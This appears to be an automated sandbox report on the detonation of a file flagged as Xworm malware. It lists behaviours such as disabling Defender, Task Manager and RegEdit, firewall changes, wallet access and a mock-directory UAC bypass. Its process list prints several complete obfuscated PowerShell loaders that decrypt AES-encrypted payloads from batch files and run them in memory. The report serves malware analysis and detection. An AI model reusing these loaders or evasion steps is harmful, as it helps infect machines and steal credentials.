Analysis Overview
Threat Level: Known bad
The file https://mega.nz/file/xrFlTTIK#PgctUxnTsOXbi92OS9LkJFrER2LAlLj9E5V-Cd-yNiY was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Contains code to disable Windows Defender
Modifies Windows Firewall
Disables Task Manager via registry modification
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Disables RegEdit via registry modification
Loads dropped DLL
Executes dropped EXE
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops desktop.ini file(s)
Sets desktop wallpaper using registry
Launches sc.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
NTFS ADS
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-01 21:16
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 21:16
Reported
2024-06-01 21:21
Platform
win11-20240426-en
Max time kernel
251s
Max time network
300s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\netsh.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows \System32\ComputerDefaults.exe | N/A |
| N/A | N/A | C:\Windows \System32\ComputerDefaults.exe | N/A |
| N/A | N/A | C:\Windows \System32\ComputerDefaults.exe | N/A |
| N/A | N/A | C:\Windows \System32\ComputerDefaults.exe | N/A |
| N/A | N/A | C:\Windows \System32\ComputerDefaults.exe | N/A |
| N/A | N/A | C:\Windows \System32\ComputerDefaults.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows \System32\ComputerDefaults.exe | N/A |
| N/A | N/A | C:\Windows \System32\ComputerDefaults.exe | N/A |
| N/A | N/A | C:\Windows \System32\ComputerDefaults.exe | N/A |
| N/A | N/A | C:\Windows \System32\ComputerDefaults.exe | N/A |
| N/A | N/A | C:\Windows \System32\ComputerDefaults.exe | N/A |
| N/A | N/A | C:\Windows \System32\ComputerDefaults.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-2994005945-4089876968-1367784197-1000\desktop.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 72931.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\KLLauncher.bat:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\SC.cmd\:SmartScreen:$DATA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\SC.cmd\:Zone.Identifier:$DATA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/xrFlTTIK#PgctUxnTsOXbi92OS9LkJFrER2LAlLj9E5V-Cd-yNiY
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff84c203cb8,0x7ff84c203cc8,0x7ff84c203cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4692 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3888 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D0 0x00000000000004D8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3364 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\KLLauncher.bat" "
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JSdjfWSDJVO0vsFyBk+nB6C+eaYDe5c6Wed/quo44aM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nV7dP2kR9B3xk+WoLdi6HA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $eHWNi=New-Object System.IO.MemoryStream(,$param_var); $LEpVk=New-Object System.IO.MemoryStream; $YuKcK=New-Object System.IO.Compression.GZipStream($eHWNi, [IO.Compression.CompressionMode]::Decompress); $YuKcK.CopyTo($LEpVk); $YuKcK.Dispose(); $eHWNi.Dispose(); $LEpVk.Dispose(); $LEpVk.ToArray();}function execute_function($param_var,$param2_var){ $KsPcG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SLQNx=$KsPcG.EntryPoint; $SLQNx.Invoke($null, $param2_var);}$eXfZO = 'C:\Users\Admin\Downloads\KLLauncher.bat';$host.UI.RawUI.WindowTitle = $eXfZO;$bbfvj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eXfZO).Split([Environment]::NewLine);foreach ($aCusZ in $bbfvj) { if ($aCusZ.StartsWith('WzKRMLykmLUrjKyUnnlN')) { $ecFtX=$aCusZ.Substring(20); break; }}$payloads_var=[string[]]$ecFtX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
C:\Windows \System32\ComputerDefaults.exe
"C:\Windows \System32\ComputerDefaults.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c call SC.cmd
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JSdjfWSDJVO0vsFyBk+nB6C+eaYDe5c6Wed/quo44aM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nV7dP2kR9B3xk+WoLdi6HA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $eHWNi=New-Object System.IO.MemoryStream(,$param_var); $LEpVk=New-Object System.IO.MemoryStream; $YuKcK=New-Object System.IO.Compression.GZipStream($eHWNi, [IO.Compression.CompressionMode]::Decompress); $YuKcK.CopyTo($LEpVk); $YuKcK.Dispose(); $eHWNi.Dispose(); $LEpVk.Dispose(); $LEpVk.ToArray();}function execute_function($param_var,$param2_var){ $KsPcG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SLQNx=$KsPcG.EntryPoint; $SLQNx.Invoke($null, $param2_var);}$eXfZO = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $eXfZO;$bbfvj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eXfZO).Split([Environment]::NewLine);foreach ($aCusZ in $bbfvj) { if ($aCusZ.StartsWith('WzKRMLykmLUrjKyUnnlN')) { $ecFtX=$aCusZ.Substring(20); break; }}$payloads_var=[string[]]$ecFtX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Crypt.bat" "
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ready.bat" "
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7pfv3IC7ad/h9x9L+91yRp6AnehvA4v4FJcPUx3O2HY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X+cU4l/F7fG8+16o5SCDLA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IlaQt=New-Object System.IO.MemoryStream(,$param_var); $Ybcnm=New-Object System.IO.MemoryStream; $Evfbh=New-Object System.IO.Compression.GZipStream($IlaQt, [IO.Compression.CompressionMode]::Decompress); $Evfbh.CopyTo($Ybcnm); $Evfbh.Dispose(); $IlaQt.Dispose(); $Ybcnm.Dispose(); $Ybcnm.ToArray();}function execute_function($param_var,$param2_var){ $QSfby=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSQnj=$QSfby.EntryPoint; $TSQnj.Invoke($null, $param2_var);}$kvOlG = 'C:\Users\Admin\AppData\Local\Temp\Crypt.bat';$host.UI.RawUI.WindowTitle = $kvOlG;$pTJta=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kvOlG).Split([Environment]::NewLine);foreach ($oFaKJ in $pTJta) { if ($oFaKJ.StartsWith('ZkqIwJCzcVBaEdxxLCQj')) { $xIiOP=$oFaKJ.Substring(20); break; }}$payloads_var=[string[]]$xIiOP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e8muxl44QzFpbnkCrjQK7MgY3wLigHlewOA/sTi7P3M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xIHx7sG5Sgt6SDumHCsJWA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $anPTb=New-Object System.IO.MemoryStream(,$param_var); $dMvJM=New-Object System.IO.MemoryStream; $JXFgn=New-Object System.IO.Compression.GZipStream($anPTb, [IO.Compression.CompressionMode]::Decompress); $JXFgn.CopyTo($dMvJM); $JXFgn.Dispose(); $anPTb.Dispose(); $dMvJM.Dispose(); $dMvJM.ToArray();}function execute_function($param_var,$param2_var){ $GfJaX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aDspK=$GfJaX.EntryPoint; $aDspK.Invoke($null, $param2_var);}$uyftC = 'C:\Users\Admin\AppData\Local\Temp\Ready.bat';$host.UI.RawUI.WindowTitle = $uyftC;$JWePL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uyftC).Split([Environment]::NewLine);foreach ($ynrHu in $JWePL) { if ($ynrHu.StartsWith('hcYJWCkzLwgEbRimAuGK')) { $ygbIC=$ynrHu.Substring(20); break; }}$payloads_var=[string[]]$ygbIC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
C:\Windows \System32\ComputerDefaults.exe
"C:\Windows \System32\ComputerDefaults.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c call SC.cmd
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7pfv3IC7ad/h9x9L+91yRp6AnehvA4v4FJcPUx3O2HY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X+cU4l/F7fG8+16o5SCDLA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IlaQt=New-Object System.IO.MemoryStream(,$param_var); $Ybcnm=New-Object System.IO.MemoryStream; $Evfbh=New-Object System.IO.Compression.GZipStream($IlaQt, [IO.Compression.CompressionMode]::Decompress); $Evfbh.CopyTo($Ybcnm); $Evfbh.Dispose(); $IlaQt.Dispose(); $Ybcnm.Dispose(); $Ybcnm.ToArray();}function execute_function($param_var,$param2_var){ $QSfby=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSQnj=$QSfby.EntryPoint; $TSQnj.Invoke($null, $param2_var);}$kvOlG = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $kvOlG;$pTJta=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kvOlG).Split([Environment]::NewLine);foreach ($oFaKJ in $pTJta) { if ($oFaKJ.StartsWith('ZkqIwJCzcVBaEdxxLCQj')) { $xIiOP=$oFaKJ.Substring(20); break; 